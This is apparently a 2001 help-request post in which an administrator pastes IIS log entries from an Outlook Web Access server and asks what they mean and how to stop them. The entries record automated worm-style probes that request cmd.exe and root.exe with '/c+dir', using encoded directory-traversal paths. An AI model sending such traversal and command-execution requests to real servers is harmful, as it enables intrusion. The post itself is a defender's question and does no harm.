I am realitively new to all this 2000 stuff. I have found some weird stuff in the syslog of a OWA machine on our network:
2001-10-03 14:58:11 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/root.exe /c+dir 404 3396 72 62 HTTP/1.0 www - - - 2001-10-03 14:58:13 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /MSADC/root.exe /c+dir 403 3439 70 0 HTTP/1.0 www - - - 2001-10-03 14:58:15 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3396 80 16 HTTP/1.0 www - - - 2001-10-03 14:58:17 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3396 80 0 HTTP/1.0 www - - - 2001-10-03 14:58:28 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - - 2001-10-03 14:58:29 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117 0 HTTP/1.0 www - - - 2001-10-03 14:58:31 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3396 117 0 HTTP/1.0 www - - - 2001-10-03 14:58:36 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 3439 145 0 HTTP/1.0 www - - - 2001-10-03 14:58:38 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 0 97 0 HTTP/1.0 www - - - 2001-10-03 14:58:48 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - - 2001-10-03 14:58:50 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - - 2001-10-03 14:58:51 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /winnt/system32/cmd.exe /c+dir 404 3396 97 0 HTTP/1.0 www - - - 2001-10-03 14:58:55 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 98 0 HTTP/1.0 www - - - 2001-10-03 14:58:56 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - - 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 0 100 0 HTTP/1.0 www - - - 2001-10-03 14:59:00 A.B.C.D - W3SVC1 WIN2000MACHINE A.B.C.D 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 0 96 0 HTTP/1.0 www - - - What is this? I imagine its some kind of hack. How do I prevent this. I cannot use the lockdown tool as this is a machine running Outlook Web Access. Thank for the help. Regards, Mark Palmer